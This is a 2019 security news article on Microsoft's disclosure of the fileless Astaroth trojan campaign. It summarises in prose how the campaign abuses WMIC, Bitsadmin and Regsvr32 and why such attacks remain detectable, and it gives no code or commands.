9 July 2019

Microsoft warns about fileless Astaroth trojan campaign

Microsoft warns about fileless Astaroth trojan campaign

Microsoft Defender ATP Research Team has disclosed details about an ongoing malware campaign that are distributing the Astaroth malware using fileless and living-off-the-land techniques that make it harder for security researchers and antivirus solutions to detect ongoing attacks.

The Astaroth malware trojan, which has been active since at least 2017, is able to steal users' sensitive information like their credentials, keystrokes, and other data, without dropping any executable file on the disk or installing any software on the victim's machine. All the information is then sent to a remote attacker who can use the data to move laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground.

While analysing the Windows telemetry data Andrea Lelli, a member of the Windows Defender ATP team spotted a sudden spike in usage of the Windows Management Instrumentation Command-line (WMIC) – a legitimate tool that ships with all modern versions of Windows. Upon further investigation it became clear that the source of suspicious activity was the campaign that aimed to run the Astaroth backdoor directly in memory.

The discovered malware campaign utilizes several lifeless techniques and a multi-stage infection process that starts with a spear-phishing email containing a malicious link that leaded the potential victims to an LNK file.

After being double-clicked, the LNK file causes the execution of the WMIC tool with the “/Format” parameter, which allows the download and execution of a JavaScript code. The JavaScript code in turn downloads payloads by abusing the legitimate Bitsadmin tool.

“Two of them result in plain DLL files (the others remain encrypted). The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypts and loads other files until the final payload, Astaroth, is injected into the Userinit process,” explained the researcher in a blogpost.

What this means is that the malware doesn’t rely on any traditional methods (vulnerability exploits or trojan downloaders) instead using only legitimate system tools and commands to achieve its goal and to masquerade its activity – a technique that security experts call "living off the land". This technique allows the malware to hide from most end-point antivirus security solutions, which are based on static files analysis.

For traditional, file-centric antivirus solutions the only window of opportunity to detect this attack may be when the two DLLs are decoded after being downloaded, said Lelli. The researcher pointed out that:

“Being invisible may help you for some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.”

 

 

Back to the list

Latest Posts

North Korean hackers adopt a new technique to infect macOS machines

North Korean hackers adopt a new technique to infect macOS machines

The found sample appears to be the Lazarus group's first in-memory malware targeting the Apple operating system.
6 December 2019
New destructive wiper ZeroCleare targets industrial and energy organizations in the Middle East

New destructive wiper ZeroCleare targets industrial and energy organizations in the Middle East

The ZeroCleare malware bears some similarity with the infamous Shamoon wiper.
5 December 2019
TrickBot operators set their sights on Japanese banks ahead of holiday season

TrickBot operators set their sights on Japanese banks ahead of holiday season

While the TrickBot malware has been spotted in other regions, this marks the first time TrickBot has been seen at Japanese banks.
4 December 2019